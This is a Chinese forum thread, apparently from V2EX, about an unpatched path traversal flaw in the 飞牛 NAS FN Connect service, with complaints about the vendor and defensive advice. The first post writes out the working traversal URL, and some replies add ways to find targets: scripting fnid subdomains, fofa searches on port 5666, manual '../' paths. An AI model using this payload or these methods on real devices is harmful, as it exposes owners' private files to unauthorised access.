打开 FN Connect 随便输入一个 id ,只要撞上了能打开登录页,加上
/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../
直接就到 /了啊
太离谱了
/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../
直接就到 /了啊
太离谱了
 |
1
stinkytofux 1 月 31 日  3
0day 就是这么可怕, 更可怕的是捂盖子, 导致更多人受害.
|
 |
2
Tink OP PRO @stinkytofux 官方为什么不强推新版本呢,强制修复漏洞
|
 |
3
Joming 1 月 31 日
TMD 到现在都没发公告!好在公司发现比较早,不然严重泄露信息!再不会用了!
|
 |
4
wfhtqp 1 月 31 日
问题是飞牛不当回事,fnid 现在还不暂停,原来没有公网的也全暴漏了
|
|
5
wfhtqp 1 月 31 日 3
https://club.fnnas.com/forum.php?mod=viewthread&tid=48354 25 年 12 月。。。还有更早的。。。
|
 |
8
labubu 2 天前 via Android
不是绑定手机了吗,打电话发短信给用户呗?
|
 |
9
bitkuang 2 天前 via Android
没复现出来,还有别的条件吧
|
 |
10
haoshuaiwang 2 天前
写个脚本跑就行了
{fnid}.fnos.net |
 |
11
baton 2 天前 via Android 1
经历过宝塔后就不敢用国内这些面板,安全性是个大问题
|
 |
12
a9htdkbv 2 天前 via Android
还好我有先见之明,昨天早上关闭 fn connect ,晚上就把整个飞牛虚拟机扬了
|
 |
14
AkinoKaedeChan 2 天前 via Android
@emoker https://www.bt.cn/bbs/thread-54666-1-1.html phpMyAdmin 未授权访问
|
 |
15
flyqie 2 天前 via Android 1
是的,之前以为飞牛官方会做紧急的限制,现在看来似乎没有任何限制,不知道是限于架构问题做不了还是不想做。
|
 |
17
emoker 2 天前
@AkinoKaedeChan 感谢大佬
|
|
18
stinkytofux 2 天前
 |
 |
19
ryd994 2 天前 via Android
我相信有很多人就是图个 fnconnect 的方便。这下好了,不能开公网,不能用 fnconnect ,结果还是要自己配置 VPN/zerotier 。
我的 nas 只能通过 VPN 或者 cloudflare tunnel 访问,后者经过 zero trust 的鉴权。所有不登入就能访问的服务(比如 BT )都跑在容器里。 |
 |
21
sardina 2 天前
2025-12-25 18:06:25 只看该作者回复
感谢反馈我转给负责的同事看看 一个月前就说反馈 结果还没修复。。。 |
 |
22
Curtion 2 天前
还真是, 直接在 fofa 搜索 5666 端口,随便找一个进去就能访问到文件了。。 我觉得飞牛应该强制关闭 fn connet ,直到用户升级系统。
 |
 |
23
MiKing233 2 天前
|
 |
25
panda188 1 天前 via Android
不会降本增效,已经把负责这个,会这个的裁了吧?
|
 |
26
hatch 1 天前
作死💊,估计内部也一团糟,问题流转半天找不到能挑担的人
|
 |
28
povsister 1 天前 1
好几天了官方反代甚至不愿意上个 WAF 救一救后面的用户。哎
|
 |
29
chinni 1 天前
其实现在点什么目录基本都 404 也没啥了,但是确实坑,不如直接用 zero trust
|
 |
32
someonesnone 1 天前
@chinni #29 你别直接点链接, 你把目录名手动放在../../xxx 试试...
|
 |
33
ritziiiiii 1 天前 via Android
不开 Fn Connect ,只开 ipv6 公网 和 ssh ,
而且也把后缀 5666 ,5667 改了,ssh 的 22 也改了,这样还会出现问题吗? 还有要不要进 PE 扫硬盘上的毒啊? |
 |
34
alenchen 1 天前
自己 ddns 的不香吗?非要走别人家里再回来
|
 |
35
crc8 1 天前
@someonesnone 不堪入目
|
 |
38
tatay 1 天前
自己的飞牛也试了一下,升到 18 版本后显示 404 了。不升级的话仍然可以访问。飞牛这一波闹大了。
|
 |
39
Rorysky 1 天前
@stinkytofux 0day 都被人大规模发出来了,还叫 0day 么? 0day 准确是指开发者都不知道漏洞,在软件更新前,搞得飞牛是个很厉害的软件系统似的。本质就是个 web 后台
|
 |
40
Valid 23 小时 57 分钟前
fn 完全可以直接拦截这个 url ,我不理解
|
 |
41
thevita 22 小时 19 分钟前
我的观点有点极端,以“体验”为核心卖点的产品,其安全性都要深入考验(但其实也没啥好办法,一般就看看对方安全负责人是谁)
1. 大概 8-9 年前小米的路由也很多这种弱智漏洞,给 src 还给了我几千块钱,基于 luci, 感觉是 lua 生态的缺乏,很多东西的实现靠手写,但写得太糙了,后来应该是安全部门介入,加了很多安全措施 2. 去年 RSC/nextjs 的漏洞也很离谱,好在处理没 fn 这么离谱,刚看说社区一个月前就有人发现了 |
 |
42
rayyume 22 小时 3 分钟前
没用过飞牛,用的 lucky 反代高位端口+cloudflare 开启 https+规则端口转发,应该还算安全吧?
|
Select Language